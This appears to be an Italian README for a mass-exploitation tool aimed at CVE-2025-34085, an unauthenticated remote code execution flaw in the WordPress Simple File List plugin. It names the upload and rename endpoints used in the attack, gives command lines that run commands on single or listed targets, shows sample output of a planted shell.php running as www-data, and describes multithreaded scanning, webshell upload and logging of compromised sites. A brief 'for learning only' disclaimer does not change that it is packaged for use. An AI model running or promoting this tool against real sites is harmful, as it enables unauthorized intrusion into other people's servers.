
Scanner automatizzato ed exploit per CVE-2025-34085, una RCE non autenticata nel plugin WordPress Simple File List. Supporta scansione multi-target, upload di webshell ed esecuzione remota di comandi.
Strumento automatico per rilevare e sfruttare l'Remote Code Execution (RCE) non autenticata nel plugin WordPress Simple File List, in particolare quelli vulnerabili a CVE-2025-34085.
Dotato di un sistema di pulizia automatica dei target e supporto multithread per essere efficiente su larga scala.
Caricamento file senza autenticazione
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRinomina del file in .php
/wp-content/plugins/simple-file-list/ee-file-engine.phpEsecuzione del payload remoto
python3 main.py -u http://target.com --cmd "id"
Inserisci l'elenco dei target nel file targets.txt, uno per riga:
python3 main.py --cmd "uname -a"
| Argomento | Descrizione |
|---|---|
-u | Target singolo (esempio: http://example.com) |
--cmd | Comando da eseguire sul target (default: id) |
--inline | Usa payload inline (senza parametro ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
I target sfruttati con successo verranno salvati automaticamente nel file vuln.txt.
main.py — Script principaletargets.txt — Elenco dei targetclean_targets.txt — Risultato della normalizzazione URLvuln.txt — Log dei target sfruttati con successotargets.txtSi raccomanda agli amministratori dei siti WordPress di:
Questo progetto è solo per apprendimento e test legittimi.
L'uso per scopi illegali è di responsabilità dei singoli individui.
Cyberlone Indonesia non è responsabile dell'abuso di questi strumenti.
Licenza: MIT License
Sentiti libero di usare, modificare e distribuire per scopi legittimi e responsabili.
Cyberlone Indonesia
🛠️ Team di Ricerca & Sfruttamento
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n